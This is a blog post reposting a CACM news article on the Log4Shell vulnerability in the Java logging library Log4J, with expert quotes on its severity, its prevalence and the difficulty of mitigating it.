/* ---- Google Analytics Code Below */

Saturday, February 19, 2022

Log4 Security Challenge

Good overview and prediction of its incfluence

A Source of Security Challenges for Years to Come

By David Geer, Commissioned by CACM Staff, February 17, 2022

"Log4Shell is probably the most dangerous software vulnerability of its type on record," says Sandeep Lahane, CEO of cloud security firm Deepfence.

On November 24, 2021, Chen Zhaojun of the Alibaba Cloud Security Team discovered the critical software vulnerability Log4Shell in the open-source Java logging utility, Log4J. Log4J comes as components in Java archive (JAR) files that software developers easily insert into their software projects without writing extra code. The security community also knows Log4Shell by its Common Vulnerabilities and Exposures (CVE) ID Number, CVE 2021-44228. The Apache Software Foundation, which supports Log4J, has given the Log4Shell vulnerability a critical severity rating of 10, which is its highest rating.

Log4Shell is severe partly because the Log4J utility is commonplace, appearing in multitudes of software. "Java is undisputedly the most common language for enterprise software applications developed over the last 10-15 years. Logging is a core application requirement, and Log4J is the standard choice for logging," explains Lahane.

Log4Shell is as trivial for cybercriminals to abuse as it is ubiquitous. A look at how Log4Shell compares with other vulnerabilities puts it into perspective. "Log4Shell is easier to exploit than OpenSSL Heartbleed, and vulnerable components are significantly more widely distributed than Apache Struts—two other highly-dangerous vulnerabilities from the last decade," says Lahane.

To locate and leverage Log4Shell, attackers scan networks for vulnerable log4j components. Once they locate the vulnerability, they send a malicious command string to the server using any protocol (TCP, HTTP, or others) that allows them to do so.

Bogus Log4J lookup commands in the malicious command strings lead Log4J to connect to malicious servers to execute remote, malicious Java code. The potential damage from Log4Shell attacks is severe; Remote Code Execution attacks like these enable an attacker to trigger malware such as worms over the Internet.

"It's important to remember that threat actors can use the same open-source scanners to detect the vulnerability that security analysts use. Many remote scanners are currently available on open-source sites like GitHub," says Karen Walsh, CEO of content marketing firm Allegro Solutions.

Log4Shell is also difficult for organizations to mitigate. An enterprise may not know whether its software uses Log4J. If the software has a dependency on a vulnerable Log4J component, it's more of a direct relationship, and it's not so difficult to find it. .... ' 

No comments: